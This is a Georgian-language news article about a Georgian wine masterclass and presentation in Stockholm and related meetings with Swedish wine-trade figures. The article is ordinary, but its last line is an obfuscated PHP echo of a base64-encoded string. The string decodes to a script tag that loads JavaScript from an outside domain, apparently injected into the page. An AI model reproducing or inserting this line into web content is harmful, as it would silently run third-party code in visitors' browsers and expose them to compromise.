celsiusi
ავერსი საქკაბელი
სკანდინავიის ქვეყნებში, ქართული ღვინის პოპულარიზაციის მიზნით, შვედეთში,  სტოკჰოლმის სომელიეთა სკოლაში „The Wine Hub” ქართული ღვინის მასტერკლასი და პრეზენტაცია გაიმართა. ამის შესახებ, საინფორმაციო სააგენტო BUSINESS TIME-ს ღვინის ეროვნული სააგენტოდან აცნობეს.  
 
ღონისძიებას, ღვინის ეროვნული სააგენტოს თავმჯდომარის მრჩეველი გოგა თევზაძე უძღვებოდა.
 
აღნიშნული ღონისძიება ღვინის ეროვნული სააგენტოს მხარდაჭერითა და შვედეთის სამეფოში საქართველოს საელჩოს ორგანიზებით ადგილობრივი სომელიეებისთვის, კვებისა და ალკოჰოლური სასმელების სფეროს წარმომადგენლებისთვის გაიმართა. 
 
ქართული ღვინის წარდგენას, შვედეთის სამეფოში საქართველოს საგანგებო და სრულუფლებიანი ელჩი ირაკლი ხუცურაული და უფროსი მრჩეველი ლევან მაჭავარიანი დაესწრნენ.
 
შვედეთის სამეფოში ვიზიტის ფარგლებში,  ღვინის ეროვნული სააგენტოს თავმჯდომარის მოადგილემ, დავით ტყემალაძემ და თავმჯდომარის მრჩეველმა, გოგა თევზაძე შეხვედრები გამართეს ალკოჰოლის რეალიზაციის სახელმწიფო მონოპოლიური კომპანიის „Systembolaget“ გაყიდვების ხელმძღვანელ ფრედერიკ არენანდერთან, მარკეტინგული კომპანიის „Wine publishing AB” დამფუძნებელ ფრედერიკ შელინთან და შვედეთში უმსხვილესი გამოფენის „Stockholm food and wine fair“პროექტების მენეჯერ ასა ბარდ ტალბორნთან. აღნიშნულ შეხვედრებზე  მხარეებმა განიხილეს შვედეთის ბაზარზე ქართული ღვინის პოპულარიზაციისა და პოტენციური მარკეტინგული აქტივობების განხორციელების შესაძლებლობები.
 
 
 
771
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");